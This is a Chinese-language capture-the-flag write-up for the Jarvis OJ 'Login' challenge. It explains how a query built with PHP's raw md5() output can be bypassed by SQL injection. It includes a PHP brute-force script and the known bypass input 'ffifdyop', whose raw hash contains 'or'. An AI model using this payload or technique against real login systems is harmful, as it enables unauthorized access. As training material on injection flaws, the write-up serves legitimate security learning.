【Jarvis OJ】Login--password='".md
Login
题目
需要密码才能获得flag哦。
题目链接:http://web.jarvisoj.com:32772
思路:
打开链接是一个提交password界面,放到burp里看一看呀~
看到有提示哦~
Hint: "select * from `admin` where password='".md5($pass,true)."'"
一看到md5,我就想到password为md5为0e开头的值。输入
password;s878926199a
这时出现了Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /opt/lampp/htdocs/index.php on line 14.才发现以上行不通。出现这个问题的原因是没有理解".md5($pass,true)."的含义呀。
参考文章:https://blog.csdn.net/March97/article/details/81222922 哈哈,在这里我找到了md5(string,raw)的含义。
关注重点放到
password='".md5($pass,true)."'
上。
参考:
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/
原始md5可以包含任何字符,并且脚本将它们按原样放入查询中 - 它是一个sql注入版本。
我们要做的是强制使用原始md5包含'或'的密码,以便查询看起来像
SELECT login FROM admins WHERE password = '<trash>' 或'1 <shit>'
这里使用的php代码
<?php
for ($i = 0;;) {
for ($c = 0; $c < 1000000; $c++, $i++)
if (stripos(md5($i, true), '\'or\'') !== false)
echo "\nmd5($i) = " . md5($i, true) . "\n";
echo ".";
}
?>
通过暴力破解,最后找到了这样一个密码呀~I’ve found a password: ffifdyop, with hash: 276f722736c95d99e921722cf9ed621c (‘or’6<trash>).
content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b
但是我们思考一下为什么6\xc9]\x99\xe9!r,\xf9\xedb\x1c的布尔值是true呢?
这里引用一篇文章。“a string starting with a 1 is cast as an integer when used as a boolean."
在mysql里面,在用作布尔型判断时,以1开头的字符串会被当做整型数。要注意的是这种情况是必须要有单引号括起来的,比如password=‘xxx’ or ‘1xxxxxxxxx’,那么就相当于password=‘xxx’ or 1 ,也就相当于password=‘xxx’ or true,所以返回值就是true。当然在我后来测试中发现,不只是1开头,只要是数字开头都是可以的。
当然如果只有数字的话,就不需要单引号,比如password=‘xxx’ or 1,那么返回值也是true。(xxx指代任意字符)